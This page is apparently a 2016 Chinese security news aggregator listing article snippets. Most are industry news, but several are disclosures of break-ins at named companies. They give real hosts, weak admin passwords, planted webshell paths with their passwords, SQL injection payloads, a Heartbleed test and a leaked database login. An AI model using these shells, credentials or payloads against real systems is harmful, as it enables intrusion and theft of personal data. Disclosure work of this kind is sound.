记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

中国电信安全帮 绿盟科技帮安全

阅读: 87月1日,北京。继1月份与中国电信签署战略合作协议后,绿盟科技持续与其云安全产品研发领域开展合作,为电信“安全帮”提供服务支撑,包括Web安全监测及防御、DDoS防御、云SaaS服务能力研发,这表明绿盟科技及其云安全服务平台“绿盟云”正逐步完善其生态系统。 文章目录互帮互助 绿盟科技为安全帮提供服务支持百万派送 安全帮云安全服务商城开业庆典活动内容求贤若渴 绿盟科技和小伙伴们共建生态圈关于“安全帮”关于“绿盟科技”互帮互助 绿盟科技为安全帮提供服务支持电信市场是在不断变化的,在“互联网+”时代,市场的竞争更为剧烈。换一个角度来说,这种环境恰恰促成了市场创新的动力,如何在不断迭代的是市场环境中发现机会,并利用手头的资源构建新的业务模式来捕捉机会是工作的重点。在这样的大背景下,绿盟科技与中国电信展开战略合

如何用深度学习识别网络欺诈?

欺诈广告背景介绍在这个资讯变化快速的时代,人手一台智慧型手机是非常普遍的情形,其中又以 Android 手机较常见,但你是否曾经注意过你手机中真的安装了什么移动 APP 应用程序吗 ? 你如何确定你的手机是否中毒以及是否需要安装什么应用程序?另一方面,你所任职的公司产品行销推广的如何呢?你是否觉得你的广告行销预算其实花得并不手软,但是理想中的流量以及产品安装和曝光量是否却总是没达到目标呢?如同市场营销大师 John Wanamaker 所说:Half the money I spend on advertising is wasted; the trouble is, I don’t know which half.那么,当你使用手机上网时,是否有曾被告知中毒,还被迫
发布时间:2016-07-02 06:40 | 阅读:287 | 评论:0 | 标签:安全报告 网络诈骗

渗透技巧——Use AutoIt script to create a keylogger

0x00 前言 在之前的文章中介绍过如何利用PSR来监控Windows桌面,但是PSR最明显的缺点是无法记录键盘的操作,所以这次就介绍一种实现键盘记录的好方法——AutoIt script 图片来自http://www.getlinkyoutube.com/watch?v=51iuVOHGUHs 0x01 简介 AutoIt: 是用以编写并生成具有 BASIC 语言风格的脚本程序的免费软件, 它被设计用来在Windows GUI(用户界面)中进行自动操作. 通过它可以组合使用模拟键击,鼠标移动和窗口/控件操作等来实现自动化任务, 而这是其它语言所无法做到或尚无可靠方法实现的 (比如VBScript和SendKeys). AutoIt 非常小巧,完全运行在所有windows操作系统上,并且不需要
发布时间:2016-07-02 03:25 | 阅读:236 | 评论:0 | 标签:技术分享

中国国旅配置不当getshell泄漏近万内部员工详细资料

http://202.96.57.47/console端口弱口令weblogicweblogic部署war木马http://202.96.57.47/ca/ma3.jsp密码carry扫内网证明是中国国旅的:百万数据库信息泄露:貌似和内部办公有关7万message信息七万内部APP信息:近万名内部员工详细资料,姓名,工号,生日,邮箱,详细住址,固定电话,手机,身份证! 漏洞证明: 修复方案:
发布时间:2016-07-02 00:35 | 阅读:204 | 评论:0 | 标签:无

瓜子二手车主站心脏滴血漏洞

code 区域python ssltest.py www.guazi.com 443泄露session信息。code 区域ending Client Hello...Waiting for Server Hello... ... received message: type = 22, ver = 0302, length = 66 ... received message: type = 22, ver = 0302, length = 3891 ... received message: type = 22, ver = 0302, length = 331 ... received message: type = 22, ver = 0302, length = 4Sending heartbe
发布时间:2016-07-02 00:35 | 阅读:180 | 评论:0 | 标签:漏洞

瓜子二手车某系统设计逻辑缺陷导致多个系统沦陷/内网漫游

系统登陆中心code 区域http://staff.guazi.com/发现另一个瓜子无线管理后台code 区域http://wuxian.guazi.com/web/#/app没有验证码及错误次数限制登录后发现并没有什么信息,没有什么权限爆破子域名发现一个 瓜子金融产品管理后台,发现大量敏感信息code 区域http://jr.bc.guazi.com/ 漏洞证明: 二十万多线索数据订单信息 包括订单人的手机号,身份证号,家庭住址等等等等信息公司邮箱code 区域https://mail.guazi.com/owa/#转向VPNcode 区域https://sslvpn.guazi.com瓜子wiki数据库我再想 运维的童鞋是多么不得见DBA啊 修复方案:
发布时间:2016-07-02 00:35 | 阅读:140 | 评论:0 | 标签:无

美的系列2之美的某站弱口令导致Getshell可内网渗透

code 区域mask 区域*****在Tomcat Manager控制台弱********************扫了一下你们的********************86bddc.png" alt="Tangsca********************署sh********************令发现********************1498e505c4ff526a35.png"********************c2716aa93cf640a53b.png"***************1.http://**.**.**/023/index.jspx shell 密码023_***************33*****************
发布时间:2016-07-02 00:35 | 阅读:331 | 评论:0 | 标签:无

人保财险某系统越权查看大量保单信息

code 区域http://www.epicc.com.cn/ecargo/code 区域账号:mask 区域*****PG**********SZHPG*****保单查询入口 漏洞证明: 抓包得到code 区域mask 区域*****go/insure!insureI**********picc.c********** keep-**********ength**********ol: ma**********,application/xml;q=0**********www.epic**********ure-Req**********bKit/537.36 (KHTML, like Gec**********on/x-www-for**********argo/insureQue
发布时间:2016-07-02 00:35 | 阅读:320 | 评论:0 | 标签:无

美丽说某处信息泄露(20W用户信息/部分订单)

首先这个信息是在github发现的数据库连接信息。IP是阿里巴巴数据中心的,青岛,看样子应该不是你们的数据库,测试应该也不是,某个开发拿出来的数据吧https://github.com/piaoxj/bankchannel/blob/efaebdebddbbb5f2be340a9852619cd9ea8a7ebf/pay-channel-access/src/main/profiles/dev/config/jdbc.propertiesjdbc.slave.url=jdbc:mysql://115.28.14.202:3306/pay_channel2?useUnicode=true&characterEncoding=UTF-8jdbc.slave.username=rootjdbc
发布时间:2016-07-02 00:35 | 阅读:322 | 评论:0 | 标签:无

小蚁科技两处安全漏洞(8W+用户信息可被泄漏)

code 区域首先SQL注入dev.xiaoyi.com:42.96.192.25http://42.96.192.25:3133/?activityid=1Parameter: activityid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: activityid=1 AND 7016=7016 Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: activityid=1 UNION ALL SELECT NULL,NULL,
发布时间:2016-07-02 00:35 | 阅读:307 | 评论:0 | 标签:漏洞

森马某系统从sql注入到getshell可威胁内网

http://pic4.semir.com/index.aspx森马使用的网盘其中code 区域http://pic4.semir.com/show.aspx?filepath=1&type=1存在sql注入 漏洞证明: get的1个帐号(123456/123456)登陆后发现系统已经被shellshell地址:http://pic4.semir.com/myfile/123456/aspx/123.aspx密码直接把马下载下来后得到code 区域chopper 修复方案: 删除shell,检查全站,强口令
发布时间:2016-07-02 00:35 | 阅读:331 | 评论:0 | 标签:注入

人面狮行动(APT-C-15)

人面狮行动(APT-C-15) 2016-07-01 15:10:55 来源:360安全播报 作者:360安全播报 阅读:735次 点赞(0) 收藏 分享到: 目录一、概述... 3二、载荷投递... 41.社交网络水
发布时间:2016-07-01 23:40 | 阅读:354 | 评论:0 | 标签:无

十大安全初创企业 等着你!

寻找中国最具创新性的初创安全公司,为国内初创安全公司提供面向投资人、行业专家、媒体和用户的展示交流机会,2016中国互联网大会的特色项目之一:安全创客汇项目亮点安全产业的孵化器工程,互联网安全创新基地;国内顶尖技术创新项目聚集地,代表了国内信息安全行业技术创新的风向标;业内顶级投资商助阵,共同打造国内首个聚焦安全的孵化器工程;强大的评委阵容,凸显会议的高规格; 大会主席谭晓生-360技术副总裁,首席安全官 嘉宾评委专家—弓峰敏 ISC首席科学家、硅谷著名安全投资人、Cyphort联合创始人兼首席架构师投资商—郑庆生 红杉资本中国基金合伙人投资商—袁文达 红点创业投资基金全球主管合伙人 投资商—牛奎光 IDG资本合伙人 投资商—陈文江 执一资本创始合伙人投资商—蔡欣华(Edward Cai)360企业安
发布时间:2016-07-01 22:30 | 阅读:354 | 评论:0 | 标签:活动集中营 IDG 北京时间 安全创客汇 新京报 红杉资本 红点资本

二十名工资最高的科技高管 仅有一家是纯安全公司

来认识一下工资最高的科技公司的CEO们Larry Ellison过去曾长时间占据薪资最高技术CEO名单的顶端。Ellison在2014年辞去了甲骨文公司CEO的职务,他的继任者们去年的平均收入为5300万美金。让我们看看如今收入最高的20位CEO。1. Mark Hurd,CEO,甲骨文甲骨文公司联合首席执行官在2015年收到了41%的加薪,让其总工资涨到了5320万美金。Hurd接近所有的工资几乎都来自股票和期权奖励,共价值5230万美金。工资:95,0000美金股票奖励:2762,5625美金期权奖励:2464,7250美金补贴和其它工资:2,2253美金总工资:5324,5128美金2. Safra Catz,CEO,甲骨文和联合首席执行官一样,Catz的收入是5320万美金,这比2014年的3770万美
发布时间:2016-07-01 22:30 | 阅读:266 | 评论:0 | 标签:行业动态 工资 现金奖励 科技高管 股票奖励

基于风险评估来做安全对企业意味着什么?

随着网络安全风险在数量和复杂度上的提升,公司企业需要从响应事件转变到发现事件以事先预防上来。发展出健壮的基于风险的安全方法,需要专注于支持企业为了能预防、检测并相应攻击而进行信息安全威胁优先级划分、理解用于攻击的技术、评估控制的能力。不了解这一点,企业便难以确定对特定威胁的暴露程度,不清楚自身网络事件响应计划是否是结构化并足以在事发时解决威胁的。保护你最敏感的信息高官们十分熟悉网络空间的巨大好处,以及互联网和今天不断增长的联网设备是如何极大增长创新、合作、效率、竞争力和客户承诺的。然而,不幸的是,这些高管中很多人都在风险与回报的评估上挣扎非常。当今时代,公司企业必须做的一件事是,确保具有标准安全措施。信息安全论坛(ISF)《良好实践标准》便是这方面指南的一个例子。该《标准》被许多跨国公司用作信息安全的主要参考。
发布时间:2016-07-01 22:30 | 阅读:272 | 评论:0 | 标签:术有专攻 信息安全论坛 响应事件 风险评估 黑客主义

安全课堂新课程发布:CMMI五折优惠+限时免费!

安全课堂一周岁啦!值此特别推出最新国际安全认证课程CMMI(Capability Maturity Model Integration),即能力成熟度模型集成,也称软件能力成熟度集成模型。 CMMI是美国国防部的一个设想,1994年由美国国防部与卡内基-梅隆大学下的软件工程研究中心以及美国国防工业协会共同开发和研制的,他们计划把现在所有现存实施的与即将被发展出来的各种能力成熟度模型,集成到一个框架中去,申请此认证的前提条件是该企业具有有效的软件企业认定证书。该课程的设置目的是帮助软件企业对软件工程过程进行管理和改进,增强开发与改进能力,从而能按时地、不超预算地开发出高质量的软件。该模型共有5级,分别代表不同级别的软件实施能力。本系列课程是基于3级能力的相关内容进行讲解,共有11个过程域,分别讲解。该课程即日起五
发布时间:2016-07-01 22:30 | 阅读:247 | 评论:0 | 标签:活动集中营 CMMI L3 Kali 安全工具 Wireshark实战 大数据安全 搜索引擎

公告

❤ 关注Hackdig微博,点击下方按钮⇩
关注Hackdig微信,学习技术更方便

工具

推而广之

标签云

友情链接